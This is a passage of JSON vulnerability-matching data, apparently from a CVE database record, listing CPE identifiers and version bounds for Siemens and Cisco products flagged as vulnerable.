ead-end_system_universal_device_integration_system:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AFDADA98-1CD0-45DA-9082-BFC383F7DB97\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:industrial_edge_management:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E33D707F-100E-4DE7-A05B-42467DE75EAC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:industrial_edge_management
_hub:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-12-13\",\"matchCriteriaId\":\"DD3EAC80-44BE-41D2-8D57-0EE3DBA1E1B1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:logo\\\\!_soft_comfort:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2AC8AB52-F4F4-440D-84F5-2776BFE1957A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:mendix:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6AF6D774-AC8C-49CA-A00B-A2740CA8FA91\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:mindsphere:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-12-11\",\"matchCriteriaId\":\"6423B1A7-F09F-421A-A0AC-3059CB89B110\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:navigator:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-12-13\",\"matchCriteriaId\":\"48C6A61B-2198-4B9E-8BCF-824643C81EC3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:nx:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BEE2F7A1-8281-48F1-8BFB-4FE0D7E1AEF4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:opcenter_intelligence:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"3.2\",\"matchCriteriaId\":\"C74B9880-FFF9-48CA-974F-54FB80F30D2D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:operation_scheduler:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.1.3\",\"matchCriteriaId\":\"74D1F4AD-9A60-4432-864F-4505B3C60659\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:sentron_powermanager:4.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7ABA5332-8D1E-4129-A557-FCECBAC12827\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:sentron_powermanager:4.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9C3AA865-5570-4C8B-99DE-431AD7B163F1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siguard_dsa:4.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"00E03FB6-37F9-4559-8C86-F203D6782920\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siguard_dsa:4.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"90439591-BA01-4007-A2B6-B316548D4595\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siguard_dsa:4.4:*:*:*:*:*:*:*\",\"
le\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.001.000:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E628231-61FB-40AF-A20B-00F5CB78E63B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.002.000:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2EA25E92-2C76-4722-BA06-53F33C0D961C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:7.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"51D2940A-0D03-415B-B72E-1F6862DDAC41\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.000:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8B346ADC-00BE-4409-B658-A11351D2A7D4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.001.001:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5A0E44A9-C427-493B-868A-8A8DA405E759\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.003:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B2B31E7C-0EB3-4996-8859-DF94A3EE20B3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3EAB3E03-275F-4942-9396-FC7A22F42C8D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"19DAD751-D170-4914-BAB2-6054DFEEF404\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_automation:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2F429F37-3576-4D8A-9901-359D65EC3CF4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_automation:2.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F526DEF1-4A3E-4FE1-8153-E9252DAE5B92\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_automation:3.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C19679D0-F4DC-4130-AFFD-692E5130531A\"},{\"vulnerable\":true,\"criteria\":\"
cpe:2.3:a:cisco:crosswork_network_automation:4.1.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"60D2FBF3-D8AB-41F0-B170-9E56FBF7E2F7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_automation:4.1.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F60324DD-8450-4B14-A7A1-0D5EA5163580\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cx_cloud_agent:001.012:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"12F6DFD1-273B-4292-A22C-F2BE0DD3FB3F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cyber_vision:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"13EA024C-97A4-4D33-BC3E-51DB77C51E76\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"85289E35-C7C2-46D0-9BDC-10648DD2C86F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_center:2.2.2.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"17282822-C082-4FBC-B46D-468DCF8EF6B8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_spaces:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F5463DA6-5D44-4C32-B46C-E8A2ADD7646B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_spaces_connector:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"54A237CF-A439-4114-AF81-D75582F29573\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:emergency_responder:11.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A37D19BF-E4F5-4AF4-8942-0C3B62C4BF2B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:emergency_responder:11.5\\\\(4.65000.14\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EF25688B-6659-4C7C-866D-79AA1166AD7A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:emergency_responder:11.5\\\\(4.66000.14\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"47B70741-90D9-4676-BF16-8A21E147F532\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:enterprise_chat_and_email:12.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"ED862A1B-E558-4D44-839C-270488E735BB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:enterprise_chat_and_email:12.5\\\\(1\\\\):*:*:*:*:*:*
:*\",\"matchCriteriaId\":\"2678AF98-1194-4810-9933-5BA50E409F88\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:enterprise_chat_and_email:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"37E7DEBD-9E47-4D08-86BC-D1B013450A98\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:3.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1A935862-18F7-45FE-B647-1A9BA454E304\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:3.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"69594997-2568-4C10-A411-69A50BFD175F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1EC39E2D-C47B-4311-BC7B-130D432549F4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EE5E6CBE-D82C-4001-87CB-73DF526F0AB1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"460E6456-0E51-45BC-868E-DEEA5E3CD366\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:5.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F7F58659-A318-42A0-83C5-8F09FCD78982\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.5\\\\(1\\\\):su1:*:*:*:*:*:*\",\"matchCriteriaId\":\"D8A49E46-8501-4697-A17A-249A7D9F5A0B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.5\\\\(1\\\\):su2:*:*:*:*:*:*\",\"matchCriteriaId\":\"5D81E7A9-0C2B-4603-91F0-ABF2380DBBA3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.6\\\\(1\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"4DFCE723-9359-40C7-BA35-B71BDF8E3CF3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.6\\\\(1\\\\):es01:*:*:*:*:*:*\",\"matchCriteriaId\":\"28B1524E-FDCA-4570-86DD-CE396271B232\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.6\\\\(1\\\\):es02:*:*:*:*:*:*\",\"matchCriteriaId
\":\"74DC6F28-BFEF-4D89-93D5-10072DAC39C8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.6\\\\(1\\\\):es03:*:*:*:*:*:*\",\"matchCriteriaId\":\"BA1D60D7-1B4A-4EEE-A26C-389D9271E005\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.2.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1D726F07-06F1-4B0A-B010-E607E0C2A280\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.3.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3ED58B0E-FCC7-48E3-A5C0-6CC54A38BAE3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B2DF0B07-8C2A-4341-8AFF-DE7E5E5B3A43\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"41E168ED-D664-4749-805E-77644407EAFE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.6.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DCD69468-8067-4A5D-B2B0-EC510D889AA0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:6.7.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"85F22403-B4EE-4303-9C94-915D3E0AC944\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:7.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BBCA75A6-0A3E-4393-8884-9F3CE190641E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D619BF54-1BA9-45D0-A876-92D7010088A0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:002.004\\\\(000.914\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"808F8065-BD3A-4802-83F9-CE132EDB8D34\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:002.006\\\\(000.156\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"B236B13E-93B9-424E-926C-95D3DBC6CA5D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:002.007\\\\(000.356\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"8A63CC83-0
A6E-4F33-A1BE-214A33B51518\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:003.000\\\\(000.458\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"37DB7759-6529-46DE-B384-10F060D86A97\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:003.001\\\\(000.518\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"8C640AD9-146E-488A-B166-A6BB940F97D3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:003.002\\\\(000.116\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"DAC1FA7E-CB1B-46E5-A248-ABACECFBD6E8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:integrated_management_controller_supervisor:002.003\\\\(002.000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7C3BD5AF-9FC1-494B-A676-CC3D4B8EAC8D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:integrated_management_controller_supervisor:2.3.2.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F477CACA-2AA0-417C-830D-F2D3AE93153A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:intersight_virtual_appliance:1.0.9-343:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7E3BE5E1-A6B6-46C7-B93B-8A9F5AEA2731\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:mobility_services_engine:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"04E0BB7B-0716-4DBD-89B9-BA11AAD77C00\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_assurance_engine:6.0\\\\(2.1912\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"64C98A76-0C31-45E7-882B-35AE0D2C5430\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"379F8D86-BE87-4250-9E85-494D331A0398\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.1\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"71F69E51-E59D-4AE3-B242-D6D2CFDB3F46\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.2\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"578DA613-8E15-4748-A4B7-646415449609\"},{\
"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.3\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"544EFAD6-CE2F-4E1D-9A00-043454B72889\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.4\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E16DF9C-3B64-4220-82B6-6E20C7807BAA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B9CD5B8A-9846-48F1-9495-77081E44CBFC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"68E6CD49-6F71-4E17-B046-FBE91CE91CB7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\\\(3\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0BDD8018-7E77-4C89-917E-ACDC678A7DE2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_insights_for_data_center:6.0\\\\(2.1914\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A7D39156-A47D-405E-8C02-CAE7D637F99A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_services_orchestrator:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5426FC59-411D-4963-AFEF-5B55F68B8958\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:optical_network_controller:1.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"810E9A92-4302-4396-94D3-3003947DB2A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:8.3\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"522C36A5-7520-4368-BD92-9AB577756493\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:8.4\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CB2EC4BE-FFAF-4605-8A96-2FEF35975540\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:8.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CA1D3C2A-E5FA-400C-AC01-27A3E5160477\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:9.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCrite
riaId\":\"63B27050-997B-4D54-8E5A-CE9E33904318\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:9.0\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5ABF05B8-1B8A-4CCF-A1AD-D8602A247718\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:9.1\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2F74580D-0011-4ED9-9A00-B4CDB6685154\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:12.5\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"17A3C22E-1980-49B6-8985-9FA76A77A836\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:paging_server:14.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B1AB42DC-CE58-448A-A6B5-56F31B15F4A0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_service_catalog:12.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9DC32B55-0C76-4669-8EAD-DCC16355E887\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6CDA737F-337E-4C30-B68D-EF908A8D6840\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9DC5A89C-CCCF-49EC-B4FC-AB98ACB79233\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4BA4F513-CBA1-4523-978B-D498CEDAE0CF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6C53C6FD-B98E-4F7E-BA4D-391C90CF9E83\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.6.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D00F6719-2C73-4D8D-8505-B9922E8A4627\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EFE9210F-39C5-4828-9608-6905C1D378D4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:sd-wan_vmanage:20.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A1CEDCE4-CFD1-434B-B157-D63329CBA24A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.1.2:*:*:*:*:*:*:*\",\"matchCriteriaId\"
:\"33660EB8-2984-4258-B8AD-141B7065C85E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.1.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0ACA346D-5103-47F0-8BD9-7A8AD9B92E98\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.1.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A38BDF03-23C8-4BB6-A44D-68818962E7CB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.1.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3104C099-FEDA-466B-93CC-D55F058F7CD3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:3.2.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"890EA1C7-5990-4C71-857F-197E6F5B4089\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:smart_phy:21.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"56F21CF4-83FE-4529-9871-0FDD70D3095E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B9331834-9EAD-46A1-9BD4-F4027E49D0C3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1a\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0E707E44-12CD-46C3-9124-639D0265432E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1b\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2FEE8482-DB64-4421-B646-9E5F560D1712\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1c\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4385CE6E-6283-4621-BBD9-8E66E2A34843\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1d\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9A6CDBD4-889B-442D-B272-C8E9A1B6AEC0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1e\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FF1E59F9-CF4F-4EFB-872C-5F503A04CCF4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1f\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1782219F-0C3D-45B7-80C7-D1DAA70D90B1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_softwar
e:2.0\\\\(1g\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DDAB3BAD-1EC6-4101-A58D-42DA48D04D0C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1h\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8F7AA674-6BC2-490F-8D8A-F575B11F4BE0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1k\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6945C4DE-C070-453E-B641-2F5B9CFA3B6D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:ucs_central_software:2.0\\\\(1l\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DAB8C7C0-D09B-4232-A88E-57D25AF45457\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.17900.52\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"ACEDB7B4-EBD4-4A37-9EE3-07EE3B46BE44\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.18119.2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"820D579C-AA45-4DC1-945A-748FFCD51CA2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.18900.97\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7B23A9A6-CD04-4D76-BE3F-AFAFBB525F5E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.21900.40\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A44E6007-7A3A-4AD3-9A65-246C59B73FB6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager:11.5\\\\(1.22900.28\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3D508E51-4075-4E34-BB7C-65AF9D56B49F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager_im_\\\\\u0026_presence_service:11.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"376D06D5-D68E-4FF0-97E5-CBA2165A05CF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_communications_manager_im_\\\\\u0026_presence_service:11.5\\\\(1.22900.6\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"18ED6B8F-2064-4BBA-A78D-4408F13C724D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisc
o:unified_computing_system:006.008\\\\(001.000\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"94091FE3-AB88-4CF5-8C4C-77B349E716A9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"91D62A73-21B5-4D16-A07A-69AED2D40CC0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:12.0\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"53F1314A-9A2C-43DC-8203-E4654EF013CC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:12.5\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0ADE468B-8F0C-490D-BB4C-358D947BA8E4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"32FEE78D-309E-491D-9AB6-98005F1CBF49\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"878D9901-675D-4444-B094-0BA505E7433F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_express:12.5\\\\(1\\\\):-:*:*:*:*:*:*\",\"matchCriteriaId\":\"66E25EE4-AB7B-42BF-A703-0C2E83E83577\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_express:12.5\\\\(1\\\\):su1:*:*:*:*:*:*\",\"matchCriteriaId\":\"D8F35520-F04A-4863-A1BC-0EDD2D1804F7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_express:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EF9855FD-7747-4D9E-9542-703B1EC9A382\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:unified_contact_center_express:12.6\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E07AF386-D8A5-44F5-A418-940C9F88A36A